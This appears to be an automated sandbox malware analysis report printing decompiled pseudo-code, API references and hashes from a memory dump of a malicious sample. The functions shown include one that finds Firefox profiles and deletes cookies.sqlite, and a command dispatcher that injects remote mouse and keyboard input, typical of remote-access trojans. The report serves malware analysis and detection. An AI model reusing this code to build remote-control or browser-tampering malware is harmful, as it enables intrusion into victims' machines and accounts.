											_t104 = E006D7558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											E006D1FD1( &_v52, _t59, _t110, E006D5343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											E006D1FC7();
											E006D1FC7();
											__eflags = DeleteFileA(E006D1F95( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E006D2084(0, _t102);
					E006DA6EF(0, _t104, _t117);
					L18:
				}
				L19:
				E006D1FC7();
				E006D1FC7();
				return 1;
			}

























                                    0x006da22d
                                    0x006da22d
                                    0x006da23b
                                    0x006da243
                                    0x006da250
                                    0x006da270
                                    0x006da278
                                    0x006da280
                                    0x006da291
                                    0x006da2ae
                                    0x006da2b0
                                    0x006da2b5
                                    0x006da2b8
                                    0x006da2eb
                                    0x006da2ed
                                    0x006da3b9
                                    0x006da3c3
                                    0x006da3c8
                                    0x006da3d1
                                    0x00000000
                                    0x006da2f3
                                    0x006da2f3
                                    0x006da2f5
                                    0x006da2f5
                                    0x006da2fc
                                    0x00000000
                                    0x006da302
                                    0x006da302
                                    0x006da308
                                    0x006da30b
                                    0x006da319
                                    0x006da319
                                    0x006da31f
                                    0x006da321
                                    0x006da321
                                    0x006da325
                                    0x006da32a
                                    0x006da32d
                                    0x006da333
                                    0x00000000
                                    0x00000000
                                    0x006da335
                                    0x006da336
                                    0x006da339
                                    0x00000000
                                    0x006da33b
                                    0x006da33b
                                    0x006da33b
                                    0x006da344
                                    0x006da344
                                    0x006da346
                                    0x00000000
                                    0x006da348
                                    0x006da360
                                    0x006da36f
                                    0x006da377
                                    0x006da37f
                                    0x006da393
                                    0x006da395
                                    0x006da3fd
                                    0x006da3ff
                                    0x00000000
                                    0x006da397
                                    0x006da397
                                    0x006da39e
                                    0x006da3a1
                                    0x006da3f2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006da3a1
                                    0x006da395
                                    0x00000000
                                    0x006da346
                                    0x006da33f
                                    0x006da341
                                    0x006da341
                                    0x00000000
                                    0x006da30d
                                    0x006da311
                                    0x006da313
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006da313
                                    0x006da30b
                                    0x00000000
                                    0x006da3a3
                                    0x006da3b1
                                    0x006da3b1
                                    0x00000000
                                    0x006da2f5
                                    0x006da2ba
                                    0x006da2bb
                                    0x006da2c4
                                    0x006da2c6
                                    0x006da2cb
                                    0x006da2cb
                                    0x006da2d0
                                    0x006da3d7
                                    0x006da3d7
                                    0x006da3d9
                                    0x006da3dc
                                    0x006da3e4
                                    0x006da3f0

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 006DA2A5
                                    • FindClose.KERNEL32(00000000), ref: 006DA2BB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 006DA2E5
                                    • DeleteFileA.KERNEL32(00000000,00000000), ref: 006DA38D
                                    • GetLastError.KERNEL32 ref: 006DA397
                                    • FindNextFileA.KERNEL32(00000000,00000010), ref: 006DA3AB
                                    • FindClose.KERNEL32(00000000), ref: 006DA3D1
                                    • FindClose.KERNEL32(00000000), ref: 006DA3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 532992503-432212279
                                    • Opcode ID: 458b199c8c073488e0a2a43f66bb5ff85e47eb8ec2d56c606617a8a043551386
                                    • Instruction ID: 06ba5769b676951021d6f6547f0dbcadb75ee1b35aeb6a9befc2f4b8e0fcafa4
                                    • Opcode Fuzzy Hash: 458b199c8c073488e0a2a43f66bb5ff85e47eb8ec2d56c606617a8a043551386
                                    • Instruction Fuzzy Hash: 97418430E041199BCB54FBB4DC65DEDB7BBAF12300F40416FE405D6391EF685A86C696
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00712C8E, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E00712C8E(void* __ebx, void* __edi, signed int __esi, void* __eflags, char _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				intOrPtr _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E007128CD();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E0071292B( &_v8) != 0 || E007128D3( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0070698A();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E007128CD();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E0071292B( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0070698A();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x73a00c; // 0x941617c6
						_v100 = _t74 ^ _t192;
						 *0x73a344 =  *0x73a344 | 0xffffffff;
						 *0x73a338 =  *0x73a338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x73b748 = 0;
						_t78 = E00709895(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E0070F98C(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E00709895(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E007101F5(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E007101F5();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E00712C8E(_t139, _t172, _t183, __eflags);
							}
						}
						E007101F5(_t183);
						__eflags = _v16 ^ _t192;
						return E006FFD1B(_v16 ^ _t192);
					} else {
						_t89 = E007128D3( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E007128FF( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E007101F5( *0x73b740);
								 *0x73b740 = 0;
								 *_t194 = 0x73b750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x73b750 * 0x3c;
									_t167 =  *0x73b7a4; // 0x0
									_push(_t171);
									 *0x73b748 = 1;
									_v12 = _t150;
									__eflags =  *0x73b796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x73b7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x73b7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0070F55B(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x73b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x73b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E007128C7()) = _v12;
								 *((intOrPtr*)(E007128BB())) = _v16;
								_t96 = E007128C1();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x73b740; // 0x0
					_t8 =  &_a4; // 0x71307e
					_t178 =  *_t8;
					if(_t168 == 0) {
						L12:
						E007101F5(_t168);
						_t154 = _t178;
						_t169 = _t154 + 1;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						 *0x73b740 = E0070F98C(_t154 - _t169, _t154 - _t169 + 1);
						_t116 = E007101F5(0);
						_t170 =  *0x73b740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t171 = _t158 + 1;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t159 = _t158 - _t171;
							_t119 = E00711916(_t170, _t158 - _t171 + 1, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0071D309(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E00706769(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E00706769(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E00706769(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t27 =  &_v12; // 0x71307e
									_t125 =  *_t27;
									if(_t124 == 0) {
										 *((char*)( *((intOrPtr*)(_t125 + 4)))) = 0;
										L44:
										 *(E007128C7()) = _v8;
										_t128 = E007128BB();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t129 = E0071D309(_t161,  *((intOrPtr*)(_t125 + 4)), 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t141 =  *((intOrPtr*)(_t135 + 1));
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t11 =  &_v12; // 0x71307e
								_t137 =  *_t11;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}




































































                                    0x00712c8e
                                    0x00712c8e
                                    0x00712c98
                                    0x00712c9d
                                    0x00712ca1
                                    0x00712ca3
                                    0x00712cab
                                    0x00712cb6
                                    0x00712e56
                                    0x00712e58
                                    0x00712e59
                                    0x00712e5a
                                    0x00712e5b
                                    0x00712e5c
                                    0x00712e5d
                                    0x00712e62
                                    0x00712e66
                                    0x00712e68
                                    0x00712e6b
                                    0x00712e72
                                    0x00712e79
                                    0x00712e7d
                                    0x00712e80
                                    0x00712e83
                                    0x00712e88
                                    0x00712e89
                                    0x00712e8b
                                    0x00712fb3
                                    0x00712fb3
                                    0x00712fb4
                                    0x00712fb5
                                    0x00712fb6
                                    0x00712fb7
                                    0x00712fb8
                                    0x00712fbd
                                    0x00712fc0
                                    0x00712fc1
                                    0x00712fc9
                                    0x00712fd0
                                    0x00712fd3
                                    0x00712fe0
                                    0x00712fe7
                                    0x00712fe8
                                    0x00712fe9
                                    0x00712fea
                                    0x00712fef
                                    0x00712ffe
                                    0x00713005
                                    0x0071300d
                                    0x0071300f
                                    0x00713019
                                    0x0071301c
                                    0x00713029
                                    0x0071302c
                                    0x0071302e
                                    0x00713047
                                    0x0071304f
                                    0x00713051
                                    0x00713057
                                    0x0071305c
                                    0x00713053
                                    0x00713053
                                    0x00000000
                                    0x00713053
                                    0x00713030
                                    0x00713030
                                    0x00713031
                                    0x00713031
                                    0x00713031
                                    0x0071305e
                                    0x00713011
                                    0x00713011
                                    0x00713011
                                    0x0071306b
                                    0x0071306d
                                    0x0071306f
                                    0x00713071
                                    0x00713081
                                    0x00713081
                                    0x00713073
                                    0x00713073
                                    0x00713076
                                    0x00000000
                                    0x00713078
                                    0x00713078
                                    0x00713079
                                    0x0071307e
                                    0x00713076
                                    0x00713087
                                    0x00713092
                                    0x0071309d
                                    0x00712e91
                                    0x00712e95
                                    0x00712e9a
                                    0x00712e9b
                                    0x00712e9d
                                    0x00000000
                                    0x00712ea3
                                    0x00712ea7
                                    0x00712eac
                                    0x00712ead
                                    0x00712eaf
                                    0x00000000
                                    0x00712eb5
                                    0x00712ebb
                                    0x00712ec0
                                    0x00712ec6
                                    0x00712ecd
                                    0x00712ed3
                                    0x00712ed6
                                    0x00712edc
                                    0x00712ee3
                                    0x00712ee9
                                    0x00712eed
                                    0x00712ef3
                                    0x00712ef6
                                    0x00712efd
                                    0x00712f02
                                    0x00712f02
                                    0x00712f04
                                    0x00712f04
                                    0x00712f07
                                    0x00712f0e
                                    0x00712f26
                                    0x00712f26
                                    0x00712f29
                                    0x00712f10
                                    0x00712f10
                                    0x00712f15
                                    0x00712f17
                                    0x00000000
                                    0x00712f19
                                    0x00712f1b
                                    0x00712f21
                                    0x00712f21
                                    0x00712f17
                                    0x00712f31
                                    0x00712f45
                                    0x00712f4b
                                    0x00712f4d
                                    0x00712f5b
                                    0x00712f5d
                                    0x00712f4f
                                    0x00712f4f
                                    0x00712f52
                                    0x00000000
                                    0x00712f54
                                    0x00712f56
                                    0x00712f56
                                    0x00712f52
                                    0x00712f72
                                    0x00712f79
                                    0x00712f7b
                                    0x00712f8a
                                    0x00712f8d
                                    0x00712f7d
                                    0x00712f7d
                                    0x00712f80
                                    0x00000000
                                    0x00712f82
                                    0x00712f85
                                    0x00712f85
                                    0x00712f80
                                    0x00712f7b
                                    0x00712f97
                                    0x00712fa1
                                    0x00712fa6
                                    0x00712fab
                                    0x00712fb2
                                    0x00712fb2
                                    0x00712eaf
                                    0x00712e9d
                                    0x00712cce
                                    0x00712cce
                                    0x00712cd4
                                    0x00712cd4
                                    0x00712cd9
                                    0x00712d0f
                                    0x00712d10
                                    0x00712d16
                                    0x00712d18
                                    0x00712d1b
                                    0x00712d1b
                                    0x00712d1d
                                    0x00712d1e
                                    0x00712d2f
                                    0x00712d34
                                    0x00712d39
                                    0x00712d43
                                    0x00000000
                                    0x00712d49
                                    0x00712d49
                                    0x00712d4b
                                    0x00712d4c
                                    0x00712d4f
                                    0x00712d4f
                                    0x00712d51
                                    0x00712d52
                                    0x00712d56
                                    0x00712d5e
                                    0x00712d63
                                    0x00712d68
                                    0x00712d70
                                    0x00712d71
                                    0x00712d77
                                    0x00712d7c
                                    0x00712d81
                                    0x00712d87
                                    0x00712d8c
                                    0x00712d8d
                                    0x00712d90
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00712d90
                                    0x00712d95
                                    0x00712d96
                                    0x00712d9b
                                    0x00712d9d
                                    0x00712d9d
                                    0x00712da5
                                    0x00712dab
                                    0x00712dae
                                    0x00712dae
                                    0x00712db2
                                    0x00000000
                                    0x00000000
                                    0x00712dbc
                                    0x00712dbc
                                    0x00712dbf
                                    0x00712dc2
                                    0x00712dc4
                                    0x00712dd2
                                    0x00712dd4
                                    0x00712dde
                                    0x00712dde
                                    0x00712de0
                                    0x00712de2
                                    0x00000000
                                    0x00000000
                                    0x00712dd9
                                    0x00712ddb
                                    0x00712ddd
                                    0x00712ddd
                                    0x00000000
                                    0x00712ddd
                                    0x00000000
                                    0x00712ddb
                                    0x00712de4
                                    0x00712de7
                                    0x00712de9
                                    0x00712df4
                                    0x00712df6
                                    0x00712e00
                                    0x00712e00
                                    0x00712e02
                                    0x00712e04
                                    0x00000000
                                    0x00000000
                                    0x00712dfb
                                    0x00712dfd
                                    0x00712dff
                                    0x00712dff
                                    0x00000000
                                    0x00712dff
                                    0x00000000
                                    0x00712dfd
                                    0x00712e00
                                    0x00712de7
                                    0x00712e06
                                    0x00712e06
                                    0x00712e08
                                    0x00712e0c
                                    0x00712e0c
                                    0x00712e11
                                    0x00712e13
                                    0x00712e16
                                    0x00712e19
                                    0x00712e1b
                                    0x00712e1b
                                    0x00712e1e
                                    0x00712e39
                                    0x00712e3c
                                    0x00712e44
                                    0x00712e49
                                    0x00712e4e
                                    0x00000000
                                    0x00712e4e
                                    0x00712e20
                                    0x00712e28
                                    0x00712e2d
                                    0x00712e30
                                    0x00712e32
                                    0x00000000
                                    0x00000000
                                    0x00712e34
                                    0x00712d81
                                    0x00000000
                                    0x00712d68
                                    0x00712cdb
                                    0x00712cdb
                                    0x00712cdd
                                    0x00712cdf
                                    0x00712cdf
                                    0x00712ce3
                                    0x00000000
                                    0x00000000
                                    0x00712ce7
                                    0x00712cfb
                                    0x00712cfb
                                    0x00712ce9
                                    0x00712ce9
                                    0x00712cef
                                    0x00000000
                                    0x00712cf1
                                    0x00712cf1
                                    0x00712cf4
                                    0x00712cf9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00712cf9
                                    0x00712cef
                                    0x00712d04
                                    0x00712d06
                                    0x00712e55
                                    0x00712e55
                                    0x00712d0c
                                    0x00712d0c
                                    0x00712d0c
                                    0x00000000
                                    0x00712d0c
                                    0x00000000
                                    0x00712d06
                                    0x00712cff
                                    0x00712d01
                                    0x00712d01
                                    0x00000000
                                    0x00712d01
                                    0x00712cd9
                                    0x00000000

                                    APIs
                                    • _free.LIBCMT ref: 00712D10
                                    • _free.LIBCMT ref: 00712D34
                                    • _free.LIBCMT ref: 00712EBB
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0072913C), ref: 00712ECD
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00712F45
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B7A8,000000FF,?,0000003F,00000000,?), ref: 00712F72
                                    • _free.LIBCMT ref: 00713087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID: ~0q$~0q
                                    • API String ID: 314583886-1753788592
                                    • Opcode ID: 493ba080b7ebd49a3a8fdd447981060614f66e173abbfb8db324d65cc3e7f03d
                                    • Instruction ID: 6d044efc3e0a4172701fa80ebee8594c29178043ac80cb5666096ac250c49ad9
                                    • Opcode Fuzzy Hash: 493ba080b7ebd49a3a8fdd447981060614f66e173abbfb8db324d65cc3e7f03d
                                    • Instruction Fuzzy Hash: 37C10671A00209EFDB209F6CDC45AEABBB9EF45310F14419AE584972D3E7388E978B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E4F84, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E006E4F84(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E006D5220(0)));
				E006D42A6( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E006D5220(0)));
									_t60 = E006D5220(4);
									_t101 =  *0x73bd74; // 0x0
									_v40 =  *_t60;
									E006E4E1E( *((intOrPtr*)(0x73bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									E006E5250(_v44, _v40);
								}
							} else {
								_t65 = E006D5220(0);
								_v44 =  *((intOrPtr*)(E006D5220(4)));
								_t67 = E006D5220(8);
								_t109 =  *0x73bd74; // 0x0
								_v44 =  *_t67;
								E006E4E1E( *((intOrPtr*)(0x73bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								E006E51F4( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E006D5220(0);
							_v40 =  *((intOrPtr*)(E006D5220(4)));
							_t74 = E006D5220(8);
							_t118 =  *0x73bd74; // 0x0
							_v48 =  *_t74;
							E006E4E1E( *((intOrPtr*)(0x73bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							E006E5198( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E006D5220(4);
						_t80 = E006D5220(3);
						_t81 = E006D5220(2);
						_t82 = E006D5220(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						E006E5288( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E006D5220(0);
					_t85 = E006D5220(1);
					E006E459C( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E006D5220(2)));
					L8:
				}
				E006D1FC7();
				return E006D1FC7();
			}
























                                    0x006e4f84
                                    0x006e4fa2
                                    0x006e4fa9
                                    0x006e4fb1
                                    0x006e4ff0
                                    0x006e4ff3
                                    0x006e504f
                                    0x006e5052
                                    0x006e50af
                                    0x006e50b2
                                    0x006e5110
                                    0x006e5113
                                    0x006e5161
                                    0x006e5164
                                    0x006e516b
                                    0x006e516e
                                    0x006e5170
                                    0x006e5171
                                    0x00000000
                                    0x006e5171
                                    0x006e5166
                                    0x006e5166
                                    0x006e5167
                                    0x006e5173
                                    0x006e517a
                                    0x006e517a
                                    0x006e5115
                                    0x006e5127
                                    0x006e512b
                                    0x006e5130
                                    0x006e5143
                                    0x006e514c
                                    0x006e515a
                                    0x006e515a
                                    0x006e50b4
                                    0x006e50b9
                                    0x006e50cf
                                    0x006e50d7
                                    0x006e50dc
                                    0x006e50ef
                                    0x006e50f8
                                    0x006e5108
                                    0x00000000
                                    0x006e5108
                                    0x006e5054
                                    0x006e5059
                                    0x006e506f
                                    0x006e5077
                                    0x006e507c
                                    0x006e508f
                                    0x006e5098
                                    0x006e50a8
                                    0x00000000
                                    0x006e50a8
                                    0x006e4ff5
                                    0x006e4ffb
                                    0x006e5008
                                    0x006e5015
                                    0x006e5022
                                    0x006e502d
                                    0x006e5037
                                    0x006e5044
                                    0x00000000
                                    0x006e5049
                                    0x006e4fb3
                                    0x006e4fb8
                                    0x006e4fc5
                                    0x006e4fe6
                                    0x006e510d
                                    0x006e510d
                                    0x006e5184
                                    0x006e5197

                                    APIs
                                    • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 006E4FD8
                                    • mouse_event.USER32 ref: 006E517A
                                      • Part of subcall function 006E4E1E: GetSystemMetrics.USER32 ref: 006E4E53
                                      • Part of subcall function 006E4E1E: GetSystemMetrics.USER32 ref: 006E4E68
                                      • Part of subcall function 006E5250: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 006E527C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: MetricsSystem$InputSendmouse_event
                                    • String ID: 0$1$2$3$4$5$6
                                    • API String ID: 1731092567-2737206560
                                    • Opcode ID: 51479a093c21d2c53ddbbdd54dbff2bca24094610b9df7163dceeb66eae92752
                                    • Instruction ID: 54a4b1249d26d5edae5822dea949fca76a2e42929321f45e0a4997f27d67656c
                                    • Opcode Fuzzy Hash: 51479a093c21d2c53ddbbdd54dbff2bca24094610b9df7163dceeb66eae92752
                                    • Instruction Fuzzy Hash: 0B51AE74A157419FD714EF20E892B9A77A6EF89310F40490EF593473D1DA30AA0DCB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E60DB, Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0073BACC,0073C998), ref: 006E60F2
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,006E5BDC,?), ref: 006E6139
                                    • GetLastError.KERNEL32(?,0073BACC,0073C998), ref: 006E6147
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,006E5BDC,?), ref: 006E6178
                                    • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,007359C4,00000000,007359C4,00000000,007359C4,?,0073BACC,0073C998), ref: 006E6248
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
